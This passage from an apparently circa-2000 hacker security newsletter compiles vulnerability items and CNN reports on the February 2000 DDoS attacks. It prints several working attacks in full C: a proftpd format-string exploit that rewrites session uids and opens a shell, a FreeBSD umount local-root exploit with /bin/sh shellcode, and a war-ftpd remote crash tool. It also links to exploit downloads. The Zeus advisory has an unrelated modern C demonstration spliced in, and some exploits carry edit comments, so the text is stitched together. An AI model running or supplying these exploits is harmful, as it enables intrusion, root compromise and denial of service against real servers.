DenyAll inside the config, But this area in memory is allocated and therefore unpredictable on a remote box. This is needed to get write access on the server (within the chroot-env). o Anonymous login: you can overwrite anything in /home/ftp. Getting out of the chroot-enviroment is impossible since proftpd doesn't use external program (to overwrite). hint: use .forward in combination with a suid file. o Local login: instant root by changing permission to suid. hint: SITE CHMOD 6755 <file> (is allowed in proftpd, not in wuftpd) I plugged this exploit in the ftp program, because this program doesn't have data-connection support. Because it's not really needed. 
I used this bug to get root on linuxppc but they never gave me credit for it. I made a x86 exploit too, but i don't have any rpm-addy's. Only my testing vals. I heard RH6.x comes with proftpd, anyone wanna let me get the addy's? mail me. Greets to grue, lockdown, DryGrain by lamagra <lamagra@uglypig.org> http://lamagra.seKure.de http://penguin.seKure.de */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/types.h> #include <netdb.h> #define NUM 150 #define DEFAULT_OFFSET 0 unsigned long resolve(char *); void usage(char *); void wait_msg(int); void ftplogin(int, char *, char *); void shell(int); extern char *optarg; extern int optind; void main(int argc, char **argv) { struct sockaddr_in addr; int sockfd,i; long port=21,*addrptr; char c, name[100],pass[100],buf[1024]; /* SET DEFAULTS */ strcpy(name,"ftp"); strcpy(pass,"h@ck.er"); while((c = getopt(argc,argv,"hn:p:c:")) != EOF) { switch(c) { case 'h': usage(argv[0]); case 'n': strncpy(name,optarg,100); break; case 'p': strncpy(pass,optarg,100); break; case 'c': port = atol(optarg); } } if((argc - optind) != 1) usage(argv[0]); bzero(&addr, sizeof(struct sockaddr_in)); addr.sin_family = AF_INET; addr.sin_port = htons(port); addr.sin_addr.s_addr = resolve(argv[optind++]); printf("Connecting....."); if((sockfd = socket(AF_INET,SOCK_STREAM,0)) == -1) { printf("failed\n"); perror("socket"); exit(-1); } if(connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("failed\n"); perror("connect"); exit(-1); } #ifdef DEBUG sockfd = fileno(stdout); #endif wait_msg(sockfd); printf("success\n"); printf("Logging in <%s>:<%s>\n",name,pass); ftplogin(sockfd,name,pass); strcpy(buf,"PWD aaaa"); /* Overwrite config to allow writing * 0x0187e608: session.anon_config, bad char in 0x0187e60a * DenyAll is at 0x1885f01 on the box i used for testing * It just fucks up the string -> DenyAll isn't found -> default is AllowAll */ buf[8] = 0x01; buf[9] = 0x88; buf[10] = 0x5f; buf[11] = 0x01; 
/* session.disable_idswithing is at 0x187e5ca */ buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xca; /* Ugly, Ugly / didn't feel like counting :-) */ strncpy(buf+16,"%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u",NUM); strcpy(buf+16+NUM,"%n%n\r\n"); write(sockfd,buf,strlen(buf)); sleep(1); /* 0x0187e5cc: session.uid*/ buf[8] = 0x01; buf[9] = 0x87; buf[10] = 0xe5; buf[11] = 0xcc; buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xce; write(sockfd,buf,strlen(buf)); /* 0x187e5d0: session.ouid */ buf[8] = 0x01; buf[9] = 0x87; buf[10] = 0xe5; buf[11] = 0xd0; buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xd2; write(sockfd,buf,strlen(buf)); /* LIST switches uid to session.ouid to bind to port 20 (ftp-data - privelidged port) */ write(sockfd,"LIST\r\n",6); /* LIST returns error "No data connection" */ do{ read(sockfd,buf,sizeof(buf)); }while(strstr(buf,"connection") == NULL); printf("Opening shell-connection\n"); shell(sockfd); printf("THE END\n"); close(sockfd); } void shell(int sockfd) { char buf[1024]; fd_set set; int len; while(1) { FD_SET(fileno(stdin),&set); FD_SET(sockfd,&set); select(sockfd+1,&set,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&set)) { memset(buf,NULL,1024); fgets(buf,1024,stdin); write(sockfd,buf,strlen(buf)); } if(FD_ISSET(sockfd,&set)) { memset(buf,NULL,1024); if((len = read(sockfd,buf,1024)) == 0) { printf("EOF.\n"); exit(-1); } if(len == -1) { perror("read"); exit(-1); } puts(buf); } } } void ftplogin(int sockfd, char *user,char *passwd) { char send[500]; memset(send,NULL,500); 
snprintf(send,500,"USER %s\r\n",user); write(sockfd,send,strlen(send)); wait_msg(sockfd); memset(send,NULL,500); snprintf(send,500,"PASS %s\r\n",passwd); write(sockfd,send,strlen(send)); wait_msg(sockfd); return; } void wait_msg(int sockfd) { char c; while(read(sockfd,(char *)&c,sizeof(char)) > 0) { if(c == '\n') break; } } unsigned long resolve(char *hostname) { struct hostent *hp; unsigned long ip; if((ip = inet_addr(hostname)) == -1) { if((hp = gethostbyname(hostname)) == NULL) { printf("Can't resolve hostname <%s>.\n",hostname); exit(-1); } memcpy(&ip,hp->h_addr,4); } return ip; } void usage(char *name) { printf("Usage: %s <host> [-n name] [-p pass] [-c port]\n",name); exit(-1); } @HWA 181.0 Insecure defaults in SCO openserver 5.0.5 leaves the barn doors open. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm ====================================================================== Network Associates, Inc. SECURITY ADVISORY February 7, 2000 SNMPD default writable community string ====================================================================== SYNOPSIS The default configuration of SCO OpenServer 5.0.5 allows local users read/write access to SNMPD via a default writable community string. ====================================================================== VULNERABLE HOSTS This configuration has been verified on SCO OpenServer 5.0.5 and may be present in earlier versions. ====================================================================== DETAILS SNMP(S.imple N.etwork M.anagement P.rotocol) is a protocol suite used to manage information obtained from network entities such as hosts, routers, switches, hubs, etc. A management station collects the information from these various network entities via SNMP variable querys. Information events called traps can also be sent from entities to managment stations notifying the station of critical changes such as changes to interface status, packet collisions, etc. 
These domains of SNMP management stations and entities are grouped together in what are called communities. The community name (called the community string) is used as the authentication method for information retrieval/traps. There are 2 types of community strings: read (public), and write (private). A read community has privileges to retrieve variables from SNMP entities and a write community has privileges to read as well as write to entity variables.

The problem lies in that the default installation of SCO OpenServer 5.0.5 has snmpd enabled with a default write (private) community string.

SCO has released a security bulletin for this vulnerability, which can be found at: http://www.sco.com/security.

======================================================================
TECHNICAL DETAILS

SNMPD, run on startup by SCO OpenServer 5.0.5, is configured by default with a writable (private) community string. This allows any local user full administrator access to the SNMPD facility. The potential abuses of this privilege include the ability to modify hostname, network interface state, IP forwarding and routing, state of network sockets (including the ability to terminate active TCP sessions and listening sockets) and the ARP cache. An attacker also has full read access to all SNMP facilities.

======================================================================
RESOLUTION

The community string definitions can be found in /etc/snmpd.comm. Remove/modify these strings and restart snmpd. Alternatively, if your site does not use SNMP, kill snmpd and remove it from system startup files.

======================================================================
CREDITS

Discovery and documentation of this vulnerability was conducted by Shawn Bracken <shawn_bracken@nai.com> at the security labs of Network Associates.
======================================================================
ABOUT THE NETWORK ASSOCIATES SECURITY LABS

The Security Labs at Network Associates hosts some of the most important research in computer security today. With over 30 security advisories published in the last 2 years, the Network Associates security auditing teams have been responsible for the discovery of many of the Internet's most serious security flaws. This advisory represents our ongoing commitment to provide critical information to the security community.

For more information about the Security Labs at Network Associates, see our website at http://www.nai.com or contact us at <seclabs@nai.com>.

======================================================================
NETWORK ASSOCIATES SECURITY LABS PGP KEY
======================================================================

@HWA

182.0 Malformed link in SERVU then a list = instant DoS (crash!)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local / Remote D.o.S Attack in Serv-U FTP-Server v2.5b for Win9x/WinNT Vulnerability

USSR Advisory Code:  USSR-2000032
Release Date:        February 04, 2000
Systems Affected:    Serv-U FTP-Server v2.5b and maybe other versions.
                     Windows 95
                     Windows 98
                     Windows NT 4.0 Workstation
                     Windows NT 4.0 Server

THE PROBLEM

UssrLabs found a buffer overflow in one Windows API, "SHGetPathFromIDList". This function converts an item identifier list to a file system path; it is just one API that manages link files under Windows. If you have one malformed link file you can crash anything that tries to translate from a .lnk file, like EXPLORER.EXE, all common dialogs and so on (copy one malformed link file to the desktop, and you can't log in to the machine).

To make Serv-U crash, just upload one malformed link file in any Serv-U directory and type the ftp command LIST, and the server crashes.

Note: this overflow does not work under Win2k.

Example malformed link in: http://www.ussrback.com/god.lnk

Binary or source for this exploit: http://www.ussrback.com/

Vendor Status: Contacted.
Vendor Url: http://ftpserv-u.deerfield.com/
Program Url: http://ftpserv-u.deerfield.com/download.cfm

Credit: USSRLABS

SOLUTION

Next version, personal code for handling link files.

Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip.
u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
http://www.ussrback.com

@HWA

183.0 FreeBSD 3.3-RELEASE /sbin/umount local exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

By babunia@freebsd.lublin.pl

Packetstorm:

/*
 *
 * (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl>
 * FreeBSD 3.3-RELEASE /sbin/umount exploit.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define NOP     0x90
#define OFS     1800
#define BUFSIZE 1024
#define ADDRS   1200
#define DIR     "babcia padlina ltd."

long getesp(void)
{
        __asm__("movl %esp, %eax\n");
}

int main(int argc, char **argv)
{
        char *execshell =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        char *buf, *p;
        int noplen, i, ofs;
        long ret, *ap;

        if(!(buf = (char *)malloc(BUFSIZE+1))) {
                perror("malloc()");
                return -1;
        }

        if (argc > 1)
                ofs = atoi(argv[1]);
        else
                ofs = OFS;

        /* NOP sled followed by the shellcode, exported as $EGG */
        noplen = BUFSIZE - strlen(execshell);
        ret = getesp() + ofs;
        memset(buf, NOP, noplen);
        buf[noplen] = '\0';     /* was buf[noplen+1], which left an unterminated byte before strcat() */
        strcat(buf, execshell);
        setenv("EGG", buf, 1);

        /* argument: ADDRS bytes filled with the guessed return address */
        if(!(buf = (char *)malloc(ADDRS+1))) {
                perror("malloc()");
                return -1;
        }
        p = buf;
        ap = (long *)p;
        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;
        p = (char *)ap;
        *p = '\0';

        fprintf(stderr, "RET: 0x%lx len: %d\n\n", ret, (int)strlen(buf));

        chdir(getenv("HOME"));
        chmod(DIR, 0755);
        rmdir(DIR);
        mkdir(DIR, 0755);
        chdir(DIR);
        chmod(".", 0);
        execl("/sbin/umount", "umount", buf, (char *)0);
        return 0;
}

@HWA

184.0 Yet another War-ftpd vulnerability (why do ppl use this?)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

Hello,

"war-ftpd" is a very popular ftp server for Windows95/98/NT. I found a DoS problem in "war-ftpd 1.6x" recently.

Outline:

It seems to occur because the bounds check of the MKD/CWD commands is imperfect when a directory is given. However, I could not hijack control of EIP as far as I tested. This is because the RET address cannot be overwritten, since the total buffer capacity seems to be checked properly in 1.66x4 and later. The boundary at which the Access Violation breaks out lies between around 533 bytes and 8182 bytes, although it differs by the thread that receives the attack.

The versions in which this vulnerability is confirmed are as follows:
1.66x4s, 1.67-3

The version in which this vulnerability was not found is as follows:
1.71-0

Test Environments:
Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2
Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2
Microsoft WindowsNT 4.0 Server SP4 Japanese version

Solution:

1.70-1 should be used to solve this problem fundamentally. Because it becomes "Access denied" in 1.71-0, the DoS did not break out.

--- warftpd-dos.c

I coded a program for the reproduction of this problem. It applies the DoS attack for "war-ftpd" to the server from a remote host.
/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90

int main(int argc,char *argv[])
{
    SOCKET sock;
    unsigned long victimaddr;
    SOCKADDR_IN victimsockaddr;
    WORD wVersionRequested;
    int nErrorStatus;
    static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF];
    struct hostent *victimhostent;
    WSADATA wsa;

    /* argv[3] is used below, so three arguments are required (was argc < 3) */
    if (argc < 4){
        printf("Usage: %s TargetHost UserName Password\n",argv[0]);
        exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    nErrorStatus = WSAStartup(wVersionRequested, &wsa);
    if (atexit((void (*)(void))(WSACleanup))) {
        fprintf(stderr,"atexit(WSACleanup)failed\n");
        exit(-1);
    }
    if ( nErrorStatus != 0 ) {
        fprintf(stderr,"Winsock Initialization failed\n");
        exit(-1);
    }

    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        fprintf(stderr,"Can't create socket.\n");
        exit(-1);
    }

    /* accept either a dotted address or a host name */
    victimaddr = inet_addr((char*)argv[1]);
    if (victimaddr == INADDR_NONE) {
        victimhostent = gethostbyname(argv[1]);
        if (victimhostent == NULL) {
            fprintf(stderr,"Can't resolve specified host.\n");
            exit(-1);
        }
        else
            victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
    }

    victimsockaddr.sin_family = AF_INET;
    victimsockaddr.sin_addr.s_addr = victimaddr;
    victimsockaddr.sin_port = htons((unsigned short)FTP_PORT);
    memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));

    if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
        fprintf(stderr,"Connection refused.\n");
        exit(-1);
    }

    printf("Attacking war-ftpd ...\n");

    /* log in normally, then send the over-long CWD argument */
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
    sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
    sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    recv(sock,(char *)packetbuf,MAXPACKETBUF,0);

    memset(buf,NOP,MAXBUF);
    buf[MAXBUF-1]=0;
    sprintf((char *)packetbuf,"CWD %s\r\n",buf);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    Sleep(100);

    shutdown(sock, 2);
    closesocket(sock);
    WSACleanup();
    printf("done.\n");
    return 0;
}

----
Toshimi Makino
E-mail:crc@sirius.imasy.or.jp

@HWA

185.0 Z0rk a Zeus Web Server DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Packetstorm:

This morning Zeus Technology Limited was informed of a serious security bug in the Zeus Webserver by 'The Relay Group' (http://relaygroup.com). This document describes the scope of the problem and its solution.

Versions affected
-----------------

Zeus 3.1.x / 3.3.x

Severity
--------

High - this bug allows the contents of CGI scripts to be read by a remote client, if the scripts are run with the CGI module's "allow CGIs anywhere" option enabled. It does not affect CGIs run from designated directories (cgi-bins). Nonetheless, we recommend that all customers upgrade to Zeus 3.3.5a - see below for further details.

Description
-----------

Requests for URLs which contain the text '%00' are decoded to contain a null-terminator. This means that files can be accessed via URLs that are not access controlled, allowing files that are *inside* the document root to be retrieved.

For example, if you run a webserver with the 'allow CGI anywhere' option, and have a Perl CGI script inside the document root accessible as 'http://mysite/script.cgi' then a request for 'http://mysite/script.cgi%00' will cause the webserver to return the Perl source of the CGI script to the client. This happens because the mime-type of '.cgi\0' does not map to 'application/x-httpd-cgi', so is instead served by the get module as 'text/plain'.
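The length mismatch the advisory describes, as an added example that is not Zeus code: a naive percent-decoder that lets %00 through (the 3.1.x/3.3.x behaviour) beside a hardened one that refuses it, plus a length-aware extension lookup showing why '.cgi\0' falls through to text/plain while the same buffer, read as a C string by the OS, still names the real script. All function names are ours.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Zeus code. url_decode_naive() mirrors the pre-3.3.5a
 * behaviour (a %00 becomes a real NUL in the decoded path); url_decode_strict()
 * is the hardened form. mime_for() plays the module table that keys on the
 * decoded extension using its true length. */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes from src into dst (capacity cap, NUL-terminated). Returns
 * the decoded length, or -1 on a malformed escape or an over-long path. Only
 * the return value knows about a %00; strlen(dst) stops at it. */
int url_decode_naive(const char *src, unsigned char *dst, size_t cap)
{
    size_t n = 0;
    for (; *src; src++) {
        int b = (unsigned char)*src;
        if (b == '%') {
            int hi = hexval((unsigned char)src[1]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[2]);
            if (hi < 0 || lo < 0) return -1;
            b = hi * 16 + lo;
            src += 2;
        }
        if (n + 1 >= cap) return -1;
        dst[n++] = (unsigned char)b;
    }
    dst[n] = 0;
    return (int)n;
}

/* Hardened: identical decoding, but any embedded NUL is refused, because every
 * C-string consumer downstream (open(2) included) would silently stop there. */
int url_decode_strict(const char *src, unsigned char *dst, size_t cap)
{
    int n = url_decode_naive(src, dst, cap);
    if (n < 0 || memchr(dst, 0, (size_t)n) != NULL) return -1;
    return n;
}

/* Extension-keyed MIME lookup over exactly len bytes. "cgi\0" is four bytes,
 * matches nothing, and so falls to text/plain: the source gets served. */
const char *mime_for(const unsigned char *path, int len)
{
    int i = len;
    while (i > 0 && path[i - 1] != '.' && path[i - 1] != '/') i--;
    if (i == 0 || path[i - 1] != '.') return "text/plain";
    if (len - i == 3 && memcmp(path + i, "cgi", 3) == 0) return "application/x-httpd-cgi";
    if (len - i == 4 && memcmp(path + i, "html", 4) == 0) return "text/html";
    return "text/plain";
}

/* 1 when url makes the naive server serve a CGI as plain text while the OS,
 * reading the same buffer as a C string, opens the real script. */
int leaks_cgi_source(const char *url)
{
    unsigned char path[256];
    int n = url_decode_naive(url, path, sizeof path);
    if (n < 0) return 0;
    const char *served_as = mime_for(path, n);                         /* what the server thinks */
    const char *os_opens  = mime_for(path, (int)strlen((char *)path)); /* what open(2) sees */
    return strcmp(served_as, "text/plain") == 0 &&
           strcmp(os_opens, "application/x-httpd-cgi") == 0;
}

int main(void)
{
    const char *urls[] = { "script.cgi", "script.cgi%00", "index.html%00" };
    for (size_t i = 0; i < sizeof urls / sizeof urls[0]; i++) {
        unsigned char path[256], check[256];
        int n = url_decode_naive(urls[i], path, sizeof path);
        int strict = url_decode_strict(urls[i], check, sizeof check);
        printf("%-16s naive len=%2d strlen=%2zu mime=%-24s leak=%d strict=%d\n",
               urls[i], n, strlen((char *)path), mime_for(path, n),
               leaks_cgi_source(urls[i]), strict);
    }
    return 0;
}
```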
The webserver will ask the OS for the file 'script.cgi\0\0', and due to the zero-terminated string interface of Unix, the OS will actually open 'script.cgi\0' instead of returning a "file-not-found" error.

Problem Solution
----------------

We have fixed the problem in the latest version of Zeus (3.3.5a) now available for all 14 platforms from our ftp site ftp://ftp.zeustechnology.com/pub/products/z3. This version will report itself as '3.3.5a' and also display today's (8th Feb) date on startup. Download the distribution for your platform, untar it, and run './zinstall --force' and it will seamlessly upgrade your running server to the fixed release.

--
Julian Midgley                  Tel: +44 1223 525000
Technical Services Manager      Fax: +44 1223 525100
Zeus Technology Ltd             http://www.zeustechnology.com
Newton House, Cambridge Business Park, Cambridge. CB4 OWZ. England

@HWA

186.0 Following up on the DDoS attacks of the last week (Various)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CNN: via Security Focus

Consulting firm says its server was used to attack AOL
February 11, 2000
Web posted at: 6:57 p.m. EST (2357 GMT)

From Interactive Technology Editor D. Ian Hopper and Justice Correspondent Pierre Thomas

NEW YORK (CNN) -- Envisioneering Group, a Long Island technology consultant, told CNN on Friday that one of its servers was hijacked on two separate days to launch a version of a denial of service attack on a major Web site.

In such assaults, hackers hijack multiple third-party computers and use those "zombie" computers to flood target sites with data, essentially shutting down access to the sites for would-be users.

The first intrusion was on January 29 and involved using a computer to pass large volumes of e-mail from a third party on to a Web site server in an attempt to overwhelm the site.
In the span of 15 minutes, several dozen e-mails a second were sent through the Envisioneering server to both Yahoo! and America Online. During the attack, engineers at Envisioneering stopped the attack, according to Envisioneering Group President Richard Doherty.

"We dumped all the pending mail, and that stopped the repeated attacks [on Envisioneering]," Doherty said.

Yahoo! was jammed by messages on Monday. The Envisioneering server was used again in the same fashion on Tuesday, a day when highly trafficked Internet sites such as Amazon.com, Buy.com and CNN.com were hit with denial of service attacks. But in the second incident involving his server, Doherty says he doesn't know exactly where the messages were sent.

AOL: Assault didn't amount to a pinprick

The first attack could have been a form of target practice to confirm that the Envisioneering server was vulnerable with the intention of using it in the later attack.

AOL, for its part, reported no out of the ordinary traffic on either of the dates cited by Doherty. The attack had no effect on the huge Internet service provider, an AOL spokeswoman said.

Envisioneering uses Mindspring for its Internet access. But even if a hacker somehow gained control of the entire Mindspring network and pointed it at AOL, it wouldn't "register a significant amount of volume to cause a problem," according to AOL spokesperson Tricia Primrose. This is because of Mindspring's relatively small total bandwidth.

With the known resources of the intruder -- one computer at Envisioneering Group -- the assault didn't even amount to a pinprick, Primrose said.

Yahoo! did not immediately return calls for comment.

AOL has proposed buying Time Warner Inc., the parent company of CNN.com. It is awaiting approval from the Federal Trade Commission.

FBI zeroing in on locations in California, Oregon

Meanwhile, CNN has learned the FBI is zeroing in on undisclosed locations in California and Oregon as it attempts to unravel this week's cyber assaults.
According to sources familiar with the investigations, the FBI is hoping to obtain computers that it believes were used in an attack on CNN.com. No arrests are considered imminent.

The FBI's planned action comes after investigators discovered the computer system at the University of California at Santa Barbara was used in the attack against CNN.com.

As the smoke begins to clear from the spate of attacks, CNN continues to get sporadic reports about other major Web sites assaulted. Excite@Home confirmed that it was attacked Wednesday night at 7 p.m. PST. The attack lasted about an hour, according to a spokesperson. About 50 percent of users trying to access the Excite portal and search engine couldn't reach the site during the attack, which targeted and overloaded routers. Only the Web site was under attack, the @Home cable network was not affected.

"We're working with the Internet community to try to find out what's going on," says Excite@Home spokesperson Kelly Distefano.

Server compromised

A University of California-Santa Barbara network administrator has confirmed that a server at the university was compromised and used in at least one of the attacks against major Web sites this week.

Sources declined to identify the owners of the computers that are being targeted. While those owners may emerge as suspects, sources point out that their computers might have been programmed without their knowledge. Still, the belief is that these computers may have been used to direct commands to a computer system at UCSB. This computer then flooded the affected Web site with millions of messages -- blocking access to customers.

UCSB administrator Kevin Schmidt said an intruder entered the UCSB machine at least twice. After entering the first time to open doors needed later, the intruder returned to install a software package designed to carry out an attack, Schmidt said.
The program, once executed, began its assault by sending out connection requests to the target Web site creating a "denial of service" attack. With enough requests sent to a single Web site, the site can be rendered inaccessible to legitimate users.

In order to conceal the attack, the program began rotating the origination addresses of the requests. This method, known generally as "spoofing," is used to thwart filters on the target machine designed to identify and weed out malicious data.

Schmidt said the intruder was "sloppy" in his work and failed to destroy all the logs monitoring activity on the server. "There wasn't a great effort to hide their presence," Schmidt said. "I don't think this behavior was atypical" of an untrained hacker.

How they did it

The intruder entered the UCSB computer through a known vulnerability in an installed network service. These vulnerabilities are frequently announced through Carnegie Mellon University's CERT group, National Infrastructure Protection Center and other network security forums. To plug the holes, administrators simply need to install patches or workarounds. However, with so many individual machines on the Internet and other demands competing for the time of a network guru, many computers are left unsecured.

Along with CNN.com, other attacks were carried out against Yahoo!, eBay and Amazon.com.

As CNN has reported, the programs needed to make a denial of service attack are very simple to find on several Web sites. They are ready-made programs that are easy for almost anyone to use.

==========================================================================

CNN:

FBI agents focus on university, business computers as cyber-attack launch pads
February 11, 2000
Web posted at: 7:48 a.m. EST (1248 GMT)
From staff and wire reports

WASHINGTON (CNN) -- The FBI is pursuing leads that a series of attacks on popular computer Web sites was launched from high-capacity computer systems at a university or at businesses. Officials believe the school or businesses were an unwitting launch pad for the string of attacks.

According to government sources, the attackers infected those computer systems with denial of service programs. Those programs in turn forced the university or business systems to send out millions of messages aimed at overloading the targeted Web sites.

Investigation scope

The massive federal investigation into this week's string of cyber attacks may extend overseas, Justice Department officials say.

Deputy Attorney General Eric Holder said there is "no indication at this point that we are looking at anything that comes from outside the country, though there have been previous, similar attacks that have been launched from outside the country, so that is a possibility we'll certainly have to consider."

Senior officials said the multistate investigation now includes major efforts by FBI field offices in four states, and involves "countless numbers" of agents in several others.

Motive still unknown

"These are people who are criminals," Holder told reporters at a Justice Department briefing Thursday. "The collective loss, and the cost to respond to these kinds of attacks, can run into the tens of millions of dollars or more."

On Wednesday, online brokerage E-Trade Group and technology news site ZDNet became the latest victims. Their sites were knocked out for more than an hour.

The attacks began Monday against Yahoo!, the largest independent Web site. They spread Tuesday to CNN.com and leading retailers Buy.com, eBay and Amazon.com.

The cyber bandits have been quick to exploit technology even as U.S. government investigators become more computer savvy.
"We need additional people," said Holder. "We need additional forensic capabilities. This is, as everybody understands, a fast-changing area." It's both fast changing and potentially devastating to Internet commerce. The Clinton administration is asking Congress to increase funding for the Justice Department's anti-cybercrime efforts by more than a third -- from roughly $100 million to $137 million. Holder said investigators inside and outside the government were working together in a complex effort to track down the hackers. He said that while authorities do not yet know the motive of sthose responsible, officials consider the matter "very serious" and that the Justice Department may have to consider increasing penalties for cyber-criminals. A senior Justice Department official involved in the probe said it's likely the hacker or hackers who clogged several popular Internet sites used "dozens or even hundreds" of computers to launch the attacks. The official, asking not to be identified, said after officials discovered certain "distributed denial of service" tools in December, a warning was sent out. Y2K daemons? The official said these tools, called daemons, can be planted on hundreds of innocent third-party computers, and await a command issued much later from a remote location to launch attacks on a single target. The official refused to comment on whether the daemons found in the intensive preparations to guard against Y2K problems were involved in the current attacks. A Senate leader who has conducted a series of hearings on countering the cyber threat issued a statement Thursday saying the government had failed to be prepared for such cyber attacks, and he promised additional hearings. "Efforts to protect critical computer networks have unfortunately not kept pace with the march of technology," said Sen. Jon Kyl,R-Arizona. 
"I have been a firm believer that it was always a question of when, not if, our vulnerabilities would be exploited by someone with malicious intent," Kyl said. "The events of the last three days confirm that view." More vigilance catching intrusions One positive development from the attacks is that some network administrators are being extra careful about checking possible intrusions. The Los Angeles Times Web site, latimes.com, received a warning from its Internet service provider, GTE Internetworking, that there had been several attacks against the ISP and urged its customers to be more vigilant. On Wednesday morning, engineers discovered that one of the latimes.com servers was running a "little abnormally," according to Dan Royal, operations manager for the site. They found that someone had entered the server from the outside and placed an "Internet relay chat" program that took up so much bandwidth as to create a disturbance. The incident had no effect on users. "It caused no damage, other than a whole lot of people pulling their hair out," Royal said. Pentagon checking its computers Pentagon officials stressed the military has not been hit by the denial of service attacks and said there's nothing to indicate the systems have been compromised. "We've been watching with great interest," said Rear Adm. Craig Quigley at Thursday's Pentagon briefing. "We need to be aware of potential hacking into the DOD computer system and be able to defend against some of those attacks." The Defense Department is putting out a message to its computer network administrators to check the hard drive systems. Quigley said the Pentagon wants "to see if someone has planted some of this denial of service tools on the drives of Defense Department computers." The spokesman said the check is to make sure the Pentagon's computers could not have unwittingly been a part of the denial of service regime that's being used to clobber some of the other servers." 
Pentagon computers were updated and prepared for any Y2K rollover glitches in a $3.6 billion fix over 18 months leading up to January 1. There was no estimate on how long the new checks would take, but the spokesman said Pentagon officials will be on their toes and aware of what's happening. The Defense Department is the federal government's single biggest user of computers.

"We have no reason to suspect that any of our systems are in fact involved in this, but we're also not sure until we check."

==============================================================================

Law enforcement asks cyber-community for more vigilance
February 9, 2000
Web posted at: 7:26 p.m. EST (0026 GMT)

WASHINGTON (CNN) -- While vowing to use the FBI, military, Secret Service and the intelligence community to find the hackers behind this week's wave of major cyber-attacks, federal law enforcement officials also encouraged the Internet community to toughen its own defenses against hackers.

"We are committed in every way possible to tracking down those responsible, to bringing them to justice and to seeing that the law is enforced," Reno said at an FBI news conference.

Several e-commerce sites, portals and news outlets were hit by the computer attacks that began Monday, leaving them unreachable to the public for hours and flooded with junk data.

"These cyber-assaults have caused millions of Internet users to be denied services," said Reno. She said the motives of the hackers are unknown, but "they appear to be intended to interfere with and disrupt legitimate electronic commerce."

